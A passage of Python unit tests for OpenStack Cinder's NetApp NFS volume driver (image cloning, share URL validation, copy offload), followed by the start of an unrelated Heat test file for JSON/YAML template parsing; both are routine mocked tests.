        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(False)

        mox.ReplayAll()
        (prop, cloned) = drv. clone_image(
            volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        if not cloned and not prop['provider_location']:
            pass
        else:
            self.fail('Expected not cloned, got cloned.')

    def test_clone_image_cloneableshare_raw(self):
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('raw'))
        drv._clone_volume(
            'img-id', 'vol', share='127.0.0.1:/share', volume_id=None)
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file({'name': 'vol'}, IgnoreArg())

        mox.ReplayAll()
        drv. clone_image(
            volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
        mox.VerifyAll()

    def test_clone_image_cloneableshare_notraw(self):
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file({'name': 'vol'}, IgnoreArg())

        mox.ReplayAll()
        drv. clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()

    def test_clone_image_file_not_discovered(self):
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(os.path, 'exists')
        mox.StubOutWithMock(drv, '_delete_file')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(False)
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        os.path.exists('/mnt/vol').AndReturn(True)
        drv._delete_file('/mnt/vol')

        mox.ReplayAll()
        vol_dict, result = drv. clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        self.assertFalse(result)
        self.assertFalse(vol_dict['bootable'])
        self.assertIsNone(vol_dict['provider_location'])

    def test_clone_image_resizefails(self):
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(os.path, 'exists')
        mox.StubOutWithMock(drv, '_delete_file')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file(
            IgnoreArg(), IgnoreArg()).AndRaise(exception.InvalidResults())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        os.path.exists('/mnt/vol').AndReturn(True)
        drv._delete_file('/mnt/vol')

        mox.ReplayAll()
        vol_dict, result = drv. clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        self.assertFalse(result)
        self.assertFalse(vol_dict['bootable'])
        self.assertIsNone(vol_dict['provider_location'])

    def test_is_cloneable_share_badformats(self):
        drv = self._driver
        strgs = ['10.61.666.22:/share/img',
                 'nfs://10.61.666.22:/share/img',
                 'nfs://10.61.666.22//share/img',
                 'nfs://com.netapp.com:/share/img',
                 'nfs://com.netapp.com//share/img',
                 'com.netapp.com://share/im\g',
                 'http://com.netapp.com://share/img',
                 'nfs://com.netapp.com:/share/img',
                 'nfs://com.netapp.com:8080//share/img'
                 'nfs://com.netapp.com//img',
                 'nfs://[ae::sr::ty::po]/img']
        for strg in strgs:
            res = drv._is_cloneable_share(strg)
            if res:
                msg = 'Invalid format matched for url %s.' % strg
                self.fail(msg)

    def test_is_cloneable_share_goodformat1(self):
        drv = self._driver
        mox = self.mox
        strg = 'nfs://10.61.222.333/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat2(self):
        drv = self._driver
        mox = self.mox
        strg = 'nfs://10.61.222.333:8080/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat3(self):
        drv = self._driver
        mox = self.mox
        strg = 'nfs://com.netapp:8080/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat4(self):
        drv = self._driver
        mox = self.mox
        strg = 'nfs://netapp.com/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat5(self):
        drv = self._driver
        mox = self.mox
        strg = 'nfs://netapp.com/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_check_share_in_use_no_conn(self):
        drv = self._driver
        share = drv._check_share_in_use(None, '/dir')
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_invalid_conn(self):
        drv = self._driver
        share = drv._check_share_in_use(':8989', '/dir')
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_incorrect_host(self):
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(utils, 'resolve_hostname')
        utils.resolve_hostname(IgnoreArg()).AndRaise(Exception())
        mox.ReplayAll()
        share = drv._check_share_in_use('incorrect:8989', '/dir')
        mox.VerifyAll()
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_success(self):
        drv = self._driver
        mox = self.mox
        drv._mounted_shares = ['127.0.0.1:/dir/share']
        mox.StubOutWithMock(utils, 'resolve_hostname')
        mox.StubOutWithMock(drv, '_share_match_for_ip')
        utils.resolve_hostname(IgnoreArg()).AndReturn('10.22.33.44')
        drv._share_match_for_ip(
            '10.22.33.44', ['127.0.0.1:/dir/share']).AndReturn('share')
        mox.ReplayAll()
        share = drv._check_share_in_use('127.0.0.1:8989', '/dir/share')
        mox.VerifyAll()
        if not share:
            self.fail('Expected share not detected')

    def test_construct_image_url_loc(self):
        drv = self._driver
        img_loc = (None,
                   [{'metadata':
                     {'share_location': 'nfs://host/path',
                      'mount_point': '/opt/stack/data/glance',
                      'type': 'nfs'},
                     'url': 'file:///opt/stack/data/glance/image-id'}])
        location = drv._construct_image_nfs_url(img_loc)
        if location != "nfs://host/path/image-id":
            self.fail("Unexpected direct url.")

    def test_construct_image_url_direct(self):
        drv = self._driver
        img_loc = ("nfs://host/path/image-id", None)
        location = drv._construct_image_nfs_url(img_loc)
        if location != "nfs://host/path/image-id":
            self.fail("Unexpected direct url.")


class NetappDirectCmodeNfsDriverOnlyTestCase(test.TestCase):
    """Test direct NetApp C Mode driver only and not inherit."""

    def setUp(self):
        super(NetappDirectCmodeNfsDriverOnlyTestCase, self).setUp()
        self._custom_setup()

    def _custom_setup(self):
        kwargs = {}
        kwargs['netapp_mode'] = 'proxy'
        kwargs['configuration'] = create_configuration()
        self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)
        self._driver.ssc_enabled = True
        self._driver.configuration.netapp_copyoffload_tool_path = 'cof_path'

    @mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
    def test_create_volume(self, mock_volume_extra_specs):
        drv = self._driver
        drv.ssc_enabled = False
        extra_specs = {}
        mock_volume_extra_specs.return_value = extra_specs
        fake_share = 'localhost:myshare'
        with mock.patch.object(drv, '_ensure_shares_mounted'):
            with mock.patch.object(drv, '_find_shares',
                                   return_value=['localhost:myshare']):
                with mock.patch.object(drv, '_do_create_volume'):
                    volume_info = self._driver.create_volume(FakeVolume(1))
                    self.assertEqual(volume_info.get('provider_location'),
                                     fake_share)

    @mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
    def test_create_volume_with_qos_policy(self, mock_volume_extra_specs):
        drv = self._driver
        drv.ssc_enabled = False
        extra_specs = {'netapp:qos_policy_group': 'qos_policy_1'}
        fake_volume = FakeVolume(1)
        fake_share = 'localhost:myshare'
        fake_qos_policy = 'qos_policy_1'
        mock_volume_extra_specs.return_value = extra_specs

        with mock.patch.object(drv, '_ensure_shares_mounted'):
            with mock.patch.object(drv, '_find_shares',
                                   return_value=['localhost:myshare']):
                with mock.patch.object(drv, '_do_create_volume'):
                    with mock.patch.object(drv,
                                           '_set_qos_policy_group_on_volume'
                                           ) as mock_set_qos:
                        volume_info = self._driver.create_volume(fake_volume)
                        self.assertEqual(volume_info.get('provider_location'),
                                         'localhost:myshare')
                        mock_set_qos.assert_called_once_with(fake_volume,
                                                             fake_share,
                                                             fake_qos_policy)

    def test_copy_img_to_vol_copyoffload_success(self):
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._try_copyoffload = mock.Mock()
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._get_vol_for_share = mock.Mock(return_value='vol')
        drv._update_stale_vols = mock.Mock()

        drv.copy_image_to_volume(context, volume, image_service, image_id)
        drv._try_copyoffload.assert_called_once_with(context, volume,
                                                     image_service,
                                                     image_id)
        drv._update_stale_vols.assert_called_once_with('vol')

    def test_copy_img_to_vol_copyoffload_failure(self):
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._try_copyoffload = mock.Mock(side_effect=Exception())
        netapp_nfs.NetAppNFSDriver.copy_image_to_volume = mock.Mock()
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._get_vol_for_share = mock.Mock(return_value='vol')
        drv._update_stale_vols = mock.Mock()

        drv.copy_image_to_volume(context, volume, image_service, image_id)
        drv._try_copyoffload.assert_called_once_with(context, volume,
                                                     image_service,
                                                     image_id)
        netapp_nfs.NetAppNFSDriver.copy_image_to_volume.\
            assert_called_once_with(context, volume, image_service, image_id)
        drv._update_stale_vols.assert_called_once_with('vol')

    def test_copy_img_to_vol_copyoffload_nonexistent_binary_path(self):
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = mock.Mock()
        image_service.get_location.return_value = (mock.Mock(), mock.Mock())
        image_service.show.return_value = {'size': 0}
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._find_image_in_cache = mock.Mock(return_value=[])
        drv._construct_image_nfs_url = mock.Mock(return_value="")
        drv._check_get_nfs_path_segs = mock.Mock(return_value=("test:test",
                                                               "dr"))
        drv._get_ip_verify_on_cluster = mock.Mock(return_value="192.1268.1.1")
        drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
        drv._get_host_ip = mock.Mock()
        drv._get_provider_location = mock.Mock()
        drv._get_export_path = mock.Mock(return_value="dr")
        drv._check_share_can_hold_size = mock.Mock()
        # Raise error as if the copyoffload file can not be found
        drv._clone_file_dst_exists = mock.Mock(side_effect=OSError())

        # Verify the original error is propagated
        self.assertRaises(OSError, drv._try_copyoffload,
                          context, volume, image_service, image_id)

    def test_copyoffload_frm_cache_success(self):
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._find_image_in_cache = mock.Mock(return_value=[('share', 'img')])
        drv._copy_from_cache = mock.Mock(return_value=True)

        drv._try_copyoffload(context, volume, image_service, image_id)
        drv._copy_from_cache.assert_called_once_with(volume,
                                                     image_id,
                                                     [('share', 'img')])

    def test_copyoffload_frm_img_service_success(self):
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._find_image_in_cache = mock.Mock(return_value=[])
        drv._copy_from_img_service = mock.Mock()

        drv._try_copyoffload(context, volume, image_service, image_id)
        drv._copy_from_img_service.assert_called_once_with(context,
                                                           volume,
                                                           image_service,
                                                           image_id)

    def test_cache_copyoffload_workflow_success(self):
        drv = self._driver
        volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
        image_id = 'image_id'
        cache_result = [('ip1:/openstack', 'img-cache-imgid')]
        drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
        drv._get_host_ip = mock.Mock(return_value='ip2')
        drv._get_export_path = mock.Mock(return_value='/exp_path')
        drv._execute = mock.Mock()
        drv._register_image_in_cache = mock.Mock()
        drv._get_provider_location = mock.Mock(return_value='/share')
        drv._post_clone_image = mock.Mock()

        copied = drv._copy_from_cache(volume, image_id, cache_result)
        self.assertTrue(copied)
        drv._get_ip_verify_on_cluster.assert_any_call('ip1')
        drv._get_export_path.assert_called_with('vol_id')
        drv._execute.assert_called_once_with('cof_path', 'ip1', 'ip1',
                                             '/openstack/img-cache-imgid',
                                             '/exp_path/name',
                                             run_as_root=False,
                                             check_exit_code=0)
        drv._post_clone_image.assert_called_with(volume)
        drv._get_provider_location.assert_called_with('vol_id')

    @mock.patch.object(image_utils, 'qemu_img_info')
    def test_img_service_raw_copyoffload_workflow_success(self,
                                                          mock_qemu_img_info):
        drv = self._driver
        volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
        image_id = 'image_id'
        context = object()
        image_service = mock.Mock()
        image_service.get_location.return_value = ('nfs://ip1/openstack/img',
                                                   None)
        image_service.show.return_value = {'size': 1,
                                           'disk_format': 'raw'}

        drv._check_get_nfs_path_segs = mock.Mock(return_value=
                                                 ('ip1', '/openstack'))
        drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
        drv._get_host_ip = mock.Mock(return_value='ip2')
        drv._get_export_path = mock.Mock(return_value='/exp_path')
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._execute = mock.Mock()
        drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
        drv._discover_file_till_timeout = mock.Mock(return_value=True)
        img_inf = mock.Mock()
        img_inf.file_format = 'raw'
        mock_qemu_img_info.return_value = img_inf
        drv._check_share_can_hold_size = mock.Mock()
        drv._move_nfs_file = mock.Mock(return_value=True)
        drv._delete_file = mock.Mock()
        drv._clone_file_dst_exists = mock.Mock()
        drv._post_clone_image = mock.Mock()

        drv._copy_from_img_service(context, volume, image_service, image_id)
        drv._get_ip_verify_on_cluster.assert_any_call('ip1')
        drv._get_export_path.assert_called_with('vol_id')
        drv._check_share_can_hold_size.assert_called_with('share', 1)

        assert drv._execute.call_count == 1
        drv._post_clone_image.assert_called_with(volume)

    @mock.patch.object(image_utils, 'convert_image')
    @mock.patch.object(image_utils, 'qemu_img_info')
    @mock.patch('os.path.exists')
    def test_img_service_qcow2_copyoffload_workflow_success(self, mock_exists,
                                                            mock_qemu_img_info,
                                                            mock_cvrt_image):
        drv = self._driver
        volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
        image_id = 'image_id'
        context = object()
        image_service = mock.Mock()
        image_service.get_location.return_value = ('nfs://ip1/openstack/img',
                                                   None)
        image_service.show.return_value = {'size': 1,
                                           'disk_format': 'qcow2'}
        drv._check_get_nfs_path_segs = mock.Mock(return_value=
                                                 ('ip1', '/openstack'))

        drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
        drv._get_host_ip = mock.Mock(return_value='ip2')
        drv._get_export_path = mock.Mock(return_value='/exp_path')
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._execute = mock.Mock()
        drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
        img_inf = mock.Mock()
        img_inf.file_format = 'raw'
        mock_qemu_img_info.return_value = img_inf
        drv._check_share_can_hold_size = mock.Mock()

        drv._move_nfs_file = mock.Mock(return_value=True)
        drv._delete_file = mock.Mock()
        drv._clone_file_dst_exists = mock.Mock()
        drv._post_clone_image = mock.Mock()

        drv._copy_from_img_service(context, volume, image_service, image_id)
        drv._get_ip_verify_on_cluster.assert_any_call('ip1')
        drv._get_export_path.assert_called_with('vol_id')
        drv._check_share_can_hold_size.assert_called_with('share', 1)
        assert mock_cvrt_image.call_count == 1
        assert drv._execute.call_count == 1
        assert drv._delete_file.call_count == 2
        drv._clone_file_dst_exists.call_count == 1
        drv._post_clone_image.assert_called_with(volume)


class NetappDirect7modeNfsDriverTestCase(NetappDirectCmodeNfsDriverTestCase):
    """Test direct NetApp C Mode driver."""
    def _custom_setup(self):
        self._driver = netapp_nfs.NetAppDirect7modeNfsDriver(
            configuration=create_configuration())

    def _prepare_delete_snapshot_mock(self, snapshot_exists):
        drv = self._driver
        mox = self.mox

        mox.StubOutWithMock(drv, '_get_provider_location')
        mox.StubOutWithMock(drv, '_volume_not_present')

        if snapshot_exists:
            mox.StubOutWithMock(drv, '_execute')
            mox.StubOutWithMock(drv, '_get_volume_path')

        drv._get_provider_location(IgnoreArg())
        drv._volume_not_present(IgnoreArg(), IgnoreArg())\
            .AndReturn(not snapshot_exists)

        if snapshot_exists:
            drv._get_volume_path(IgnoreArg(), IgnoreArg())
            drv._execute('rm', None, run_as_root=True)

        mox.ReplayAll()

        return mox

    def test_check_for_setup_error_version(self):
        drv = self._driver
        drv._client = api.NaServer("127.0.0.1")

        # check exception raises when version not found
        self.assertRaises(exception.VolumeBackendAPIException,
                          drv.check_for_setup_error)

        drv._client.set_api_version(1, 8)

        # check exception raises when not supported version
        self.assertRaises(exception.VolumeBackendAPIException,
                          drv.check_for_setup_error)

    def test_check_for_setup_error(self):
        mox = self.mox
        drv = self._driver
        drv._client = api.NaServer("127.0.0.1")
        drv._client.set_api_version(1, 9)
        required_flags = [
            'netapp_transport_type',
            'netapp_login',
            'netapp_password',
            'netapp_server_hostname',
            'netapp_server_port']

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, None)
        # check exception raises when flags are not set
        self.assertRaises(exception.CinderException,
                          drv.check_for_setup_error)

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, 'val')

        mox.ReplayAll()

        drv.check_for_setup_error()

        mox.VerifyAll()

        # restore initial FLAGS
        for flag in required_flags:
            delattr(drv.configuration, flag)

    def test_do_setup(self):
        mox = self.mox
        drv = self._driver
        mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
        mox.StubOutWithMock(drv, '_get_client')
        mox.StubOutWithMock(drv, '_do_custom_setup')
        netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
        drv._get_client()
        drv._do_custom_setup(IgnoreArg())

        mox.ReplayAll()

        drv.do_setup(IsA(context.RequestContext))

        mox.VerifyAll()

    def _prepare_clone_mock(self, status):
        drv = self._driver
        mox = self.mox

        volume = FakeVolume()
        setattr(volume, 'provider_location', '127.0.0.1:/nfs')

        mox.StubOutWithMock(drv, '_get_export_ip_path')
        mox.StubOutWithMock(drv, '_get_actual_path_for_export')
        mox.StubOutWithMock(drv, '_start_clone')
        mox.StubOutWithMock(drv, '_wait_for_clone_finish')
        if status == 'fail':
            mox.StubOutWithMock(drv, '_clear_clone')

        drv._get_export_ip_path(
            IgnoreArg(), IgnoreArg()).AndReturn(('127.0.0.1', '/nfs'))
        drv._get_actual_path_for_export(IgnoreArg()).AndReturn('/vol/vol1/nfs')
        drv._start_clone(IgnoreArg(), IgnoreArg()).AndReturn(('1', '2'))
        if status == 'fail':
            drv._wait_for_clone_finish('1', '2').AndRaise(
                api.NaApiError('error', 'error'))
            drv._clear_clone('1')
        else:
            drv._wait_for_clone_finish('1', '2')
        return mox

    def test_clone_volume_clear(self):
        drv = self._driver
        mox = self._prepare_clone_mock('fail')

        mox.ReplayAll()

        volume_name = 'volume_name'
        clone_name = 'clone_name'
        volume_id = volume_name + str(hash(volume_name))
        try:
            drv._clone_volume(volume_name, clone_name, volume_id)
        except Exception as e:
            if isinstance(e, api.NaApiError):
                pass
            else:
                raise

        mox.VerifyAll()

#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import os

import mock
import six
import yaml

from heat.common import config
from heat.common import exception
from heat.common import template_format
from heat.tests.common import HeatTestCase
from heat.tests import utils


class JsonToYamlTest(HeatTestCase):

    def setUp(self):
        super(JsonToYamlTest, self).setUp()
        self.expected_test_count = 2
        self.longMessage = True
        self.maxDiff = None

    def test_convert_all_templates(self):
        path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                            'templates')

        template_test_count = 0
        for (json_str,
             yml_str,
             file_name) in self.convert_all_json_to_yaml(path):

            self.compare_json_vs_yaml(json_str, yml_str, file_name)
            template_test_count += 1
            if template_test_count >= self.expected_test_count:
                break

        self.assertTrue(template_test_count >= self.expected_test_count,
                        'Expected at least %d templates to be tested, not %d' %
                        (self.expected_test_count, template_test_count))

    def compare_json_vs_yaml(self, json_str, yml_str, file_name):
        yml = template_format.parse(yml_str)

        self.assertEqual(u'2012-12-12', yml[u'HeatTemplateFormatVersion'],
                         file_name)
        self.assertFalse(u'AWSTemplateFormatVersion' in yml, file_name)
        del(yml[u'HeatTemplateFormatVersion'])

        jsn = template_format.parse(json_str)

        if u'AWSTemplateFormatVersion' in jsn:
            del(jsn[u'AWSTemplateFormatVersion'])

        self.assertEqual(yml, jsn, file_name)

    def convert_all_json_to_yaml(self, dirpath):
        for path in os.listdir(dirpath):
            if not path.endswith('.template') and not path.endswith('.json'):
                continue
            f = open(os.path.join(dirpath, path), 'r')
            json_str = f.read()

            yml_str = template_format.convert_json_to_yaml(json_str)
            yield (json_str, yml_str, f.name)


class YamlMinimalTest(HeatTestCase):

    def _parse_template(self, tmpl_str, msg_str):
        parse_ex = self.assertRaises(ValueError,
                                     template_format.parse,
                                     tmpl_str)
        self.assertIn(msg_str, six.text_type(parse_ex))

    def test_long_yaml(self):
        template = {'HeatTemplateFormatVersion': '2012-12-12'}
        config.cfg.CONF.set_override('max_template_size', 1024)
        template['Resources'] = ['a'] * (config.cfg.CONF.max_template_size / 3)
        limit = config.cfg.CONF.max_template_size
        long_yaml = yaml.safe_dump(template)
        self.assertTrue(len(long_yaml) > limit)
        ex = self.assertRaises(exception.RequestLimitExceeded,
                               template_format.parse, long_yaml)
        msg = ('Request limit exceeded: Template exceeds maximum allowed size '
               '(1024 bytes)')
        self.assertEqual(msg, six.text_type(ex))

    def test_parse_no_version_format(self):
        yaml = ''
        self._parse_template(yaml, 'Template format version not found')
        yaml2 = '''Parameters: {}
Mappings: {}
Resources: {}
Outputs: {}
'''
        self._parse_template(yaml2, 'Template format version not found')

    def test_parse_string_template(self):
        tmpl_str = 'just string'
        msg = 'The template is not a JSON object or YAML mapping.'
        self._parse_template(tmpl_str, msg)

    def test_parse_invalid_yaml_and_json_template(self):
        tmpl_str = '{test'
        msg = 'line 1, column 1'
        self._parse_template(tmpl_str, msg)

    def test_parse_json_document(self):
        tmpl_str = '["foo" , "bar"]'
        msg = 'The template is not a JSON object or YAML mapping.'
        self._parse_template(tmpl_str, msg)

    def test_parse_empty_json_template(self):
        tmpl_str = '{}'
        msg = 'Template format version not found'
        self._parse_template(tmpl_str, msg)

    def test_parse_yaml_template(self):
        tmpl_str = 'heat_template_version: 2013-05-23'
        expected = {'heat_template_version': '2013-05-23'}
        self.assertEqual(expected, template_format.parse(tmpl_str))


class YamlParseExceptions(HeatTestCase):

    scenarios = [
        ('scanner', dict(raised_exception=yaml.scanner.ScannerError())),
        ('parser', dict(raised_exception=yaml.parser.ParserError())),
        ('reader',
         dict(raised_exception=yaml.reader.ReaderError('', '', '', '', ''))),
    ]

    def test_parse_to_value_exception(self):
        text = 'not important'

        with mock.patch.object(yaml, 'load') as yaml_loader:
            yaml_loader.side_effect = self.raised_exception

            self.assertRaises(ValueError,
                              template_format.parse, text)


class JsonYamlResolvedCompareTest(HeatTestCase):

    def setUp(self):
        super(JsonYamlResolvedCompareTest, self).setUp()
        self.longMessage = True
        self.maxDiff = None

    def load_template(self, file_name):
